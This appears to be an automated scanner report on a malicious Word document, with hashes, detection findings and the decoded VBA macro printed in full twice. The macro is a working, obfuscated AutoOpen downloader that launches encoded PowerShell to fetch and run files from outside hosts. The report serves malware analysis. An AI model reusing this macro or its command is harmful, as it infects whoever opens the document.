Office (OLE) malware analysis — malicious · a4e95e9c610f89c9

MALICIOUS

Office (OLE)

85.0 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 53f8658eea6dca641cbe982c210b4602 SHA-1: c0ba6769954fefa7040dfd6ce70c540ed06ef21d SHA-256: a4e95e9c610f89c9ac646a8b0330babf0cc3854ac310e1786c1777c2c8fb9ff7

290 Risk Score

Heuristics 9

ClamAV: Doc.Malware.00536d-6723914-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6723914-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

  Call IsError(VBA.Interaction.Shell(Trim(Join(Array(diaIwiLETuLylvikOWuvaNYMAnIGacY, zwugaWESuxOxuWyNOzoLARIfOjIDoiOSAPaTLez, taJIkucAgoZAziNiaUSOLINatAV, cOciCaLVAgabeLUhqopikOGEVuDsUFY), "")), (25 - (100 / (2 * 2)))))

cmd.exe reference in VBA high OLE_VBA_CMD

cmd.exe reference in VBA

Matched line in script

On Error Resume Next
diaIwiLETuLylvikOWuvaNYMAnIGacY = "cmd.exe /c P^" + Format(ChrW((35 * 2) + (10 - 1))) + "^W^e^r^s^" + Format(ChrW(2 + (35 * 2))) + "^e^l^L^.^E^X^e^ ^-^E^C^ ^K^A^B^" + Format(ChrW((35 * 2) + (10 - 1))) + "^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^" + Format(ChrW(2 + (35 * 2))) + "^M^A^d^A^B^l^A^G^0^A^L^g^B^" + Format(ChrW((35 * 2) + (10 - 1))) + "^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^ …

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

Const BeTOsunUQOCHEZYRibJitOpEpigK = 0
Sub AutoOpen()
On Error Resume Next

Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7541 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7541 bytes
SHA-256: `0ab3d5163d7b0d7bf84849aabdf6a8914ce17b75b088c3c5c23d76caf2fb327b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Const BeTOsunUQOCHEZYRibJitOpEpigK = 0 Sub AutoOpen() On Error Resume Next diaIwiLETuLylvikOWuvaNYMAnIGacY = "cmd.exe /c P^" + Format(ChrW((35 * 2) + (10 - 1))) + "^W^e^r^s^" + Format(ChrW(2 + (35 * 2))) + "^e^l^L^.^E^X^e^ ^-^E^C^ ^K^A^B^" + Format(ChrW((35 * 2) + (10 - 1))) + "^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^" + Format(ChrW(2 + (35 * 2))) + "^M^A^d^A^B^l^A^G^0^A^L^g^B^" + Format(ChrW((35 * 2) + (10 - 1))) + "^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^" + Format(ChrW(2 + (35 * 2))) + "^Q^A^c^A^A^6^A^C^8^A^L^w^B^k^A^G^U^A^c^g^B^3^A^G^E^A^Z^w^B^p^A^G^U^A^d^A^B^l^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^S^A^F^U^A^S^Q^A^v^A^G^w^A^Z^Q^B^2^A^G^8^A^b^g^B^k^A^C^4^A^c^A^B^o^A^" + Format(ChrW(2 + (35 * 2))) + "^A" zwugaWESuxOxuWyNOzoLARIfOjIDoiOSAPaTLez = "^A^P^w^B^s^A^D^0^A^Z^w^B^v^A^G^s^A^c^w^A^0^A^C^4^A^e^A^B^h^A^" + Format(ChrW(2 + (35 * 2))) + "^A^A^I^g^A^s^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^I^A^A^r^A^C^A^A^J^w^B^c^A^G^U^A^Y^Q^B^h^A^D^M^A^" + Format(ChrW((35 * 2) + (10 - 1))) + "^Q^B^j^A^D^c^A^N^g^A^u^A^G^U^A^e^A^B^l^A^C^c^A^K^Q^A^7^A^C^A^A^U^w^B^0^A^G^E^A^c^g^B^0^A^C^0^A^U^A^B^y^A^G^8^A^Y^w^B^l^A^" + Format(ChrW(2 + (35 * 2))) + "^M^A^c^w^A^g^A^C^Q^A^Z^Q^B^u^A^" + Format(ChrW(2 + (35 * 2))) + "^Y^A^" + Format(ChrW((35 * 2) + (10 - 1))) + "^g^B^B^A^F^A^A^U^A^B^E^A^E^E^A^V^A^B^B^A^C^c^A^X^A^B^l^A^G^E^A^Y^Q^A^z^A^D^k^A^Y^w^A^3^A^D^Y^A^L^g^B^l^A^" + Format(ChrW(2 + (35 * 2))) + "^g^A^Z^Q^A^n^A^D^s^A^I^A^A^g^A^E" Dim aABEsihyROKYtulJApyrosiNIGazEcibC aABEsihyROKYtulJApyrosiNIGazEcibC = IsError(Choose(10, "SiaTafyrocYmmYty", "SiaTafyrocYmmYty", "aABEsihyROKYtulJApyrosiNIGazEcibC")) IsError CVErr(3335) If IsNull(aABEsihyROKYtulJApyrosiNIGazEcibC_SiaTafyrocYmmYty) And IsError(CVErr(10)) Then SiaTafyrocYmmYty_aABEsihyROKYtulJApyrosiNIGazEcibC = CStr("-3335") + UCase("SiaTafyrocYmmYty") End If Dim CYQACIBUGupuPisopetQyiaUlUGya CYQACIBUGupuPisopetQyiaUlUGya = IsError(Choose(9, "iIRexowiCXegyDUgo", "iIRexowiCXegyDUgo", "CYQACIBUGupuPisopetQyiaUlUGya")) IsError CVErr(1749) If IsNull(CYQACIBUGupuPisopetQyiaUlUGya_iIRexowiCXegyDUgo) And IsError(CVErr(9)) Then iIRexowiCXegyDUgo_CYQACIBUGupuPisopetQyiaUlUGya = CStr("-1749") + UCase("iIRexowiCXegyDUgo") End If taJIkucAgoZAziNiaUSOLINatAV = "^k^A^R^Q^B^Y^A^C^g^A^K^A^B^" + Format(ChrW((35 * 2) + (10 - 1))) + "^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^" + Format(ChrW(2 + (35 * 2))) + "^M^A^d^A^B^l^A^G^0^A^L^g^B^" + Format(ChrW((35 * 2) + (10 - 1))) + "^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^U^w^B^0^A^" + Format(ChrW(2 + (35 * 2))) + "^I^A^a^Q^B^u^A^G^c^A^K^A^A^i^A^G^g^A^d^A^B^0^A^" + Format(ChrW(2 + (35 * 2))) + "^A^A^" + Format(ChrW((35 * 2) + (10 - 1))) + "^g^A^v^A^C^8^A^N^Q^A^0^A^C^4^A^M^w^A^5^A^C^4^A^N^w^A^0^A^C^4^A^M^Q^A^y^A^D^Q^A^L^w^B^s^A^G^U^A^d^g^B^v^A^G^4^A^Z^A^A^u^A^" + Format(ChrW(2 + (35 * 2))) + "^A^A^a^A^B^w^A^C^I^A^K^Q^A^p^A^D^s^A^I^A^B^F^A^" + Format(ChrW(2 + (35 * 2))) + "^g^A^a^Q^B^0^A" Dim iAZIqIaIOPUSotedYRIpIFuNufiJaHeoi iAZIqIaIOPUSotedYRIpIFuNufiJaHeoi = IsError(Choose(4, "ROcahatAiOnuTyNeDE", "ROcahatAiOnuTyNeDE", "iAZIqIaIOPUSotedYRIpIFuNufiJaHeoi")) IsError CVErr(3366) If IsNull(iAZIqIaIOPUSotedYRIpIFuNufiJaHeoi_ROcahatAiOnuTyNeDE) And IsError(CVErr(4)) Then ROcahatAiOnuTyNeDE_iAZIqIaIOPUSotedYRIpIFuNufiJaHeoi = CStr("-3366") + UCase("ROcahatAiOnuTyNeDE") End If Dim iEluKEFeXeFUrYZEqArOiIrOfUTybUPUFyZeTi iEluKEFeXeFUrYZEqArOiIrOfUTybUPUFyZeTi = IsError(Choose(1, "CImLufuTADdAtuGii", "CImLufuTADdAtuGii", "iEluKEFeXeFUrYZEqArOiIrOfUTybUPUFyZeTi")) IsError CVErr(5389) If IsNull(iEluKEFeXeFUrYZEqArOiIrOfUTybUPUFyZeTi_CImLufuTADdAtuGii) And IsError(CVErr(1)) Then CImLufuTADdAtuGii_iEluKEFeXeFUrYZEqArOiIrOfUTybUPUFyZeTi = CStr("-5389") + UCase("CImLufuTADdAtuGii") End If Dim niHaBcaLUXEBESydACAdSaBujUtYrAX niHaBcaLUXEBESydACAdSaBujUtYrAX = IsError(Choose(10, "xyxKaNIxUZApocaVEgRAH", "xyxKaNIxUZApocaVEgRAH", "niHaBcaLUXEBESydACAdSaBujUtYrAX")) IsError CVErr(8524) If IsNull(niHaBcaLUXEBESydACAdSaBujUtYrAX_xyxKaNIxUZApocaVEgRAH) And IsError(CVErr(10)) Then xyxKaNIxUZApocaVEgRAH_niHaBcaLUXEBESydACAdSaBujUtYrAX = CStr("-8524") + UCase("xyxKaNIxUZApocaVEgRAH") End If cOciCaLVAgabeLUhqopikOGEVuDsUFY = "^A^=^=" Dim iuBAxEkEHuviasYAnIboJAGuxyg iuBAxEkEHuviasYAnIboJAGuxyg = IsError(Choose(10, "hEWEzacIFEUBOtoNOzaK", "hEWEzacIFEUBOtoNOzaK", "iuBAxEkEHuviasYAnIboJAGuxyg")) IsError CVErr(1106) If IsNull(iuBAxEkEHuviasYAnIboJAGuxyg_hEWEzacIFEUBOtoNOzaK) And IsError(CVErr(10)) Then hEWEzacIFEUBOtoNOzaK_iuBAxEkEHuviasYAnIboJAGuxyg = CStr("-1106") + UCase("hEWEzacIFEUBOtoNOzaK") End If Call DUjEMezUfIZvUjcUNOBOiIJuHA(diaIwiLETuLylvikOWuvaNYMAnIGacY & "", zwugaWESuxOxuWyNOzoLARIfOjIDoiOSAPaTLez + CStr(""), taJIkucAgoZAziNiaUSOLINatAV, "4756874682", cOciCaLVAgabeLUhqopikOGEVuDsUFY) Dim dYxeSOqYteJugEfDUmumuCYvesImENeSu dYxeSOqYteJugEfDUmumuCYvesImENeSu = IsError(Choose(5, "cYnZilOGyaI", "cYnZilOGyaI", "dYxeSOqYteJugEfDUmumuCYvesImENeSu")) IsError CVErr(5796) If IsNull(dYxeSOqYteJugEfDUmumuCYvesImENeSu_cYnZilOGyaI) And IsError(CVErr(5)) Then cYnZilOGyaI_dYxeSOqYteJugEfDUmumuCYvesImENeSu = CStr("-5796") + UCase("cYnZilOGyaI") End If End Sub Sub DUjEMezUfIZvUjcUNOBOiIJuHA(diaIwiLETuLylvikOWuvaNYMAnIGacY, zwugaWESuxOxuWyNOzoLARIfOjIDoiOSAPaTLez, taJIkucAgoZAziNiaUSOLINatAV, LAcYNYbYhAVLIFRyfIguLagEce, cOciCaLVAgabeLUhqopikOGEVuDsUFY) On Error Resume Next Dim XOTYDIMoFENoNatiJIQogYraXOfeqASeRsEfIVeHY XOTYDIMoFENoNatiJIQogYraXOfeqASeRsEfIVeHY = IsError(Choose(5, "loZaTekiaIronAVEVig", "loZaTekiaIronAVEVig", "XOTYDIMoFENoNatiJIQogYraXOfeqASeRsEfIVeHY")) IsError CVErr(272) If IsNull(XOTYDIMoFENoNatiJIQogYraXOfeqASeRsEfIVeHY_loZaTekiaIronAVEVig) And IsError(CVErr(5)) Then loZaTekiaIronAVEVig_XOTYDIMoFENoNatiJIQogYraXOfeqASeRsEfIVeHY = CStr("-272") + UCase("loZaTekiaIronAVEVig") End If Call IsError(VBA.Interaction.Shell(Trim(Join(Array(diaIwiLETuLylvikOWuvaNYMAnIGacY, zwugaWESuxOxuWyNOzoLARIfOjIDoiOSAPaTLez, taJIkucAgoZAziNiaUSOLINatAV, cOciCaLVAgabeLUhqopikOGEVuDsUFY), "")), (25 - (100 / (2 * 2))))) Dim TvIDikeJQiPEjYDaNesFniRATuQyroViruGAzajADUXU TvIDikeJQiPEjYDaNesFniRATuQyroViruGAzajADUXU = IsError(Choose(7, "GYSOauJcEgum", "GYSOauJcEgum", "TvIDikeJQiPEjYDaNesFniRATuQyroViruGAzajADUXU")) IsError CVErr(1587) If IsNull(TvIDikeJQiPEjYDaNesFniRATuQyroViruGAzajADUXU_GYSOauJcEgum) And IsError(CVErr(7)) Then GYSOauJcEgum_TvIDikeJQiPEjYDaNesFniRATuQyroViruGAzajADUXU = CStr("-1587") + UCase("GYSOauJcEgum") End If Dim nUtuyzoPULULaZyJuCgivAwyPemEdIRyzUL nUtuyzoPULULaZyJuCgivAwyPemEdIRyzUL = IsError(Choose(8, "nAVekAsulicEREmUWy", "nAVekAsulicEREmUWy", "nUtuyzoPULULaZyJuCgivAwyPemEdIRyzUL")) IsError CVErr(9220) If IsNull(nUtuyzoPULULaZyJuCgivAwyPemEdIRyzUL_nAVekAsulicEREmUWy) And IsError(CVErr(8)) Then nAVekAsulicEREmUWy_nUtuyzoPULULaZyJuCgivAwyPemEdIRyzUL = CStr("-9220") + UCase("nAVekAsulicEREmUWy") End If End Sub

SHA-256: 0ab3d5163d7b0d7bf84849aabdf6a8914ce17b75b088c3c5c23d76caf2fb327b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const BeTOsunUQOCHEZYRibJitOpEpigK = 0
Sub AutoOpen()
On Error Resume Next
diaIwiLETuLylvikOWuvaNYMAnIGacY = "cmd.exe /c P^" + Format(ChrW((35 * 2) + (10 - 1))) + "^W^e^r^s^" + Format(ChrW(2 + (35 * 2))) + "^e^l^L^.^E^X^e^ ^-^E^C^ ^K^A^B^" + Format(ChrW((35 * 2) + (10 - 1))) + "^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^" + Format(ChrW(2 + (35 * 2))) + "^M^A^d^A^B^l^A^G^0^A^L^g^B^" + Format(ChrW((35 * 2) + (10 - 1))) + "^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^" + Format(ChrW(2 + (35 * 2))) + "^Q^A^c^A^A^6^A^C^8^A^L^w^B^k^A^G^U^A^c^g^B^3^A^G^E^A^Z^w^B^p^A^G^U^A^d^A^B^l^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^S^A^F^U^A^S^Q^A^v^A^G^w^A^Z^Q^B^2^A^G^8^A^b^g^B^k^A^C^4^A^c^A^B^o^A^" + Format(ChrW(2 + (35 * 2))) + "^A"

zwugaWESuxOxuWyNOzoLARIfOjIDoiOSAPaTLez = "^A^P^w^B^s^A^D^0^A^Z^w^B^v^A^G^s^A^c^w^A^0^A^C^4^A^e^A^B^h^A^" + Format(ChrW(2 + (35 * 2))) + "^A^A^I^g^A^s^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^I^A^A^r^A^C^A^A^J^w^B^c^A^G^U^A^Y^Q^B^h^A^D^M^A^" + Format(ChrW((35 * 2) + (10 - 1))) + "^Q^B^j^A^D^c^A^N^g^A^u^A^G^U^A^e^A^B^l^A^C^c^A^K^Q^A^7^A^C^A^A^U^w^B^0^A^G^E^A^c^g^B^0^A^C^0^A^U^A^B^y^A^G^8^A^Y^w^B^l^A^" + Format(ChrW(2 + (35 * 2))) + "^M^A^c^w^A^g^A^C^Q^A^Z^Q^B^u^A^" + Format(ChrW(2 + (35 * 2))) + "^Y^A^" + Format(ChrW((35 * 2) + (10 - 1))) + "^g^B^B^A^F^A^A^U^A^B^E^A^E^E^A^V^A^B^B^A^C^c^A^X^A^B^l^A^G^E^A^Y^Q^A^z^A^D^k^A^Y^w^A^3^A^D^Y^A^L^g^B^l^A^" + Format(ChrW(2 + (35 * 2))) + "^g^A^Z^Q^A^n^A^D^s^A^I^A^A^g^A^E"


Dim aABEsihyROKYtulJApyrosiNIGazEcibC

aABEsihyROKYtulJApyrosiNIGazEcibC = IsError(Choose(10, "SiaTafyrocYmmYty", "SiaTafyrocYmmYty", "aABEsihyROKYtulJApyrosiNIGazEcibC"))
IsError CVErr(3335)

If IsNull(aABEsihyROKYtulJApyrosiNIGazEcibC_SiaTafyrocYmmYty) And IsError(CVErr(10)) Then
   SiaTafyrocYmmYty_aABEsihyROKYtulJApyrosiNIGazEcibC = CStr("-3335") + UCase("SiaTafyrocYmmYty")
End If


Dim CYQACIBUGupuPisopetQyiaUlUGya

CYQACIBUGupuPisopetQyiaUlUGya = IsError(Choose(9, "iIRexowiCXegyDUgo", "iIRexowiCXegyDUgo", "CYQACIBUGupuPisopetQyiaUlUGya"))
IsError CVErr(1749)

If IsNull(CYQACIBUGupuPisopetQyiaUlUGya_iIRexowiCXegyDUgo) And IsError(CVErr(9)) Then
   iIRexowiCXegyDUgo_CYQACIBUGupuPisopetQyiaUlUGya = CStr("-1749") + UCase("iIRexowiCXegyDUgo")
End If


taJIkucAgoZAziNiaUSOLINatAV = "^k^A^R^Q^B^Y^A^C^g^A^K^A^B^" + Format(ChrW((35 * 2) + (10 - 1))) + "^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^" + Format(ChrW(2 + (35 * 2))) + "^M^A^d^A^B^l^A^G^0^A^L^g^B^" + Format(ChrW((35 * 2) + (10 - 1))) + "^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^U^w^B^0^A^" + Format(ChrW(2 + (35 * 2))) + "^I^A^a^Q^B^u^A^G^c^A^K^A^A^i^A^G^g^A^d^A^B^0^A^" + Format(ChrW(2 + (35 * 2))) + "^A^A^" + Format(ChrW((35 * 2) + (10 - 1))) + "^g^A^v^A^C^8^A^N^Q^A^0^A^C^4^A^M^w^A^5^A^C^4^A^N^w^A^0^A^C^4^A^M^Q^A^y^A^D^Q^A^L^w^B^s^A^G^U^A^d^g^B^v^A^G^4^A^Z^A^A^u^A^" + Format(ChrW(2 + (35 * 2))) + "^A^A^a^A^B^w^A^C^I^A^K^Q^A^p^A^D^s^A^I^A^B^F^A^" + Format(ChrW(2 + (35 * 2))) + "^g^A^a^Q^B^0^A"

Dim iAZIqIaIOPUSotedYRIpIFuNufiJaHeoi

iAZIqIaIOPUSotedYRIpIFuNufiJaHeoi = IsError(Choose(4, "ROcahatAiOnuTyNeDE", "ROcahatAiOnuTyNeDE", "iAZIqIaIOPUSotedYRIpIFuNufiJaHeoi"))
IsError CVErr(3366)

If IsNull(iAZIqIaIOPUSotedYRIpIFuNufiJaHeoi_ROcahatAiOnuTyNeDE) And IsError(CVErr(4)) Then
   ROcahatAiOnuTyNeDE_iAZIqIaIOPUSotedYRIpIFuNufiJaHeoi = CStr("-3366") + UCase("ROcahatAiOnuTyNeDE")
End If



Dim iEluKEFeXeFUrYZEqArOiIrOfUTybUPUFyZeTi

iEluKEFeXeFUrYZEqArOiIrOfUTybUPUFyZeTi = IsError(Choose(1, "CImLufuTADdAtuGii", "CImLufuTADdAtuGii", "iEluKEFeXeFUrYZEqArOiIrOfUTybUPUFyZeTi"))
IsError CVErr(5389)

If IsNull(iEluKEFeXeFUrYZEqArOiIrOfUTybUPUFyZeTi_CImLufuTADdAtuGii) And IsError(CVErr(1)) Then
   CImLufuTADdAtuGii_iEluKEFeXeFUrYZEqArOiIrOfUTybUPUFyZeTi = CStr("-5389") + UCase("CImLufuTADdAtuGii")
End If


Dim niHaBcaLUXEBESydACAdSaBujUtYrAX

niHaBcaLUXEBESydACAdSaBujUtYrAX = IsError(Choose(10, "xyxKaNIxUZApocaVEgRAH", "xyxKaNIxUZApocaVEgRAH", "niHaBcaLUXEBESydACAdSaBujUtYrAX"))
IsError CVErr(8524)

If IsNull(niHaBcaLUXEBESydACAdSaBujUtYrAX_xyxKaNIxUZApocaVEgRAH) And IsError(CVErr(10)) Then
   xyxKaNIxUZApocaVEgRAH_niHaBcaLUXEBESydACAdSaBujUtYrAX = CStr("-8524") + UCase("xyxKaNIxUZApocaVEgRAH")
End If


cOciCaLVAgabeLUhqopikOGEVuDsUFY = "^A^=^="
Dim iuBAxEkEHuviasYAnIboJAGuxyg

iuBAxEkEHuviasYAnIboJAGuxyg = IsError(Choose(10, "hEWEzacIFEUBOtoNOzaK", "hEWEzacIFEUBOtoNOzaK", "iuBAxEkEHuviasYAnIboJAGuxyg"))
IsError CVErr(1106)

If IsNull(iuBAxEkEHuviasYAnIboJAGuxyg_hEWEzacIFEUBOtoNOzaK) And IsError(CVErr(10)) Then
   hEWEzacIFEUBOtoNOzaK_iuBAxEkEHuviasYAnIboJAGuxyg = CStr("-1106") + UCase("hEWEzacIFEUBOtoNOzaK")
End If




Call DUjEMezUfIZvUjcUNOBOiIJuHA(diaIwiLETuLylvikOWuvaNYMAnIGacY & "", zwugaWESuxOxuWyNOzoLARIfOjIDoiOSAPaTLez + CStr(""), taJIkucAgoZAziNiaUSOLINatAV, "4756874682", cOciCaLVAgabeLUhqopikOGEVuDsUFY)

Dim dYxeSOqYteJugEfDUmumuCYvesImENeSu

dYxeSOqYteJugEfDUmumuCYvesImENeSu = IsError(Choose(5, "cYnZilOGyaI", "cYnZilOGyaI", "dYxeSOqYteJugEfDUmumuCYvesImENeSu"))
IsError CVErr(5796)

If IsNull(dYxeSOqYteJugEfDUmumuCYvesImENeSu_cYnZilOGyaI) And IsError(CVErr(5)) Then
   cYnZilOGyaI_dYxeSOqYteJugEfDUmumuCYvesImENeSu = CStr("-5796") + UCase("cYnZilOGyaI")
End If


End Sub
Sub DUjEMezUfIZvUjcUNOBOiIJuHA(diaIwiLETuLylvikOWuvaNYMAnIGacY, zwugaWESuxOxuWyNOzoLARIfOjIDoiOSAPaTLez, taJIkucAgoZAziNiaUSOLINatAV, LAcYNYbYhAVLIFRyfIguLagEce, cOciCaLVAgabeLUhqopikOGEVuDsUFY)
On Error Resume Next

Dim XOTYDIMoFENoNatiJIQogYraXOfeqASeRsEfIVeHY

XOTYDIMoFENoNatiJIQogYraXOfeqASeRsEfIVeHY = IsError(Choose(5, "loZaTekiaIronAVEVig", "loZaTekiaIronAVEVig", "XOTYDIMoFENoNatiJIQogYraXOfeqASeRsEfIVeHY"))
IsError CVErr(272)

If IsNull(XOTYDIMoFENoNatiJIQogYraXOfeqASeRsEfIVeHY_loZaTekiaIronAVEVig) And IsError(CVErr(5)) Then
   loZaTekiaIronAVEVig_XOTYDIMoFENoNatiJIQogYraXOfeqASeRsEfIVeHY = CStr("-272") + UCase("loZaTekiaIronAVEVig")
End If


  
  Call IsError(VBA.Interaction.Shell(Trim(Join(Array(diaIwiLETuLylvikOWuvaNYMAnIGacY, zwugaWESuxOxuWyNOzoLARIfOjIDoiOSAPaTLez, taJIkucAgoZAziNiaUSOLINatAV, cOciCaLVAgabeLUhqopikOGEVuDsUFY), "")), (25 - (100 / (2 * 2)))))


Dim TvIDikeJQiPEjYDaNesFniRATuQyroViruGAzajADUXU

TvIDikeJQiPEjYDaNesFniRATuQyroViruGAzajADUXU = IsError(Choose(7, "GYSOauJcEgum", "GYSOauJcEgum", "TvIDikeJQiPEjYDaNesFniRATuQyroViruGAzajADUXU"))
IsError CVErr(1587)

If IsNull(TvIDikeJQiPEjYDaNesFniRATuQyroViruGAzajADUXU_GYSOauJcEgum) And IsError(CVErr(7)) Then
   GYSOauJcEgum_TvIDikeJQiPEjYDaNesFniRATuQyroViruGAzajADUXU = CStr("-1587") + UCase("GYSOauJcEgum")
End If


Dim nUtuyzoPULULaZyJuCgivAwyPemEdIRyzUL

nUtuyzoPULULaZyJuCgivAwyPemEdIRyzUL = IsError(Choose(8, "nAVekAsulicEREmUWy", "nAVekAsulicEREmUWy", "nUtuyzoPULULaZyJuCgivAwyPemEdIRyzUL"))
IsError CVErr(9220)

If IsNull(nUtuyzoPULULaZyJuCgivAwyPemEdIRyzUL_nAVekAsulicEREmUWy) And IsError(CVErr(8)) Then
   nAVekAsulicEREmUWy_nUtuyzoPULULaZyJuCgivAwyPemEdIRyzUL = CStr("-9220") + UCase("nAVekAsulicEREmUWy")
End If



End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.